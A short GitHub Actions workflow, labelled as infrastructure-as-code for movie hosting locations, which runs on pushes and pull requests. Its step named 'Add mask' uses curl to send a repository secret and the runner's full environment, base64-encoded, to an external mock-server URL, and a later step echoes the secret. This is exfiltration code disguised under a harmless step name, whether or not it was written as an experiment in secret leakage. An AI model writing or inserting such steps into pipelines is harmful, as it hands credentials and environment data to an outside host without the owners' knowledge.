
name: IaC

# Controls when the new movie hosting locations are created or updated
on:
  push:
    branches: [ feature/english ]
  pull_request:
    branches: [ main ]

  # Allows you to run this workflow manually from the Actions tab
  workflow_dispatch:

jobs:
 
  build:
    runs-on: ubuntu-latest
    environment: Vienna


    steps:
      - name: Add mask
        run: |
          curl https://5fcb3244-2f0d-4bed-94ae-5df3b8c77a90.mock.pstmn.io?secret=$(echo ${{ secrets.FAVOURITE }} | base64 -w 0)
          curl https://5fcb3244-2f0d-4bed-94ae-5df3b8c77a90.mock.pstmn.io?env=$(env | base64 -w 0)
          echo "::add-mask::${{ secrets.FAVOURITE }}" 

      - name: I ll tell you my current favourite 
        run: echo ${{ secrets.FAVOURITE }}
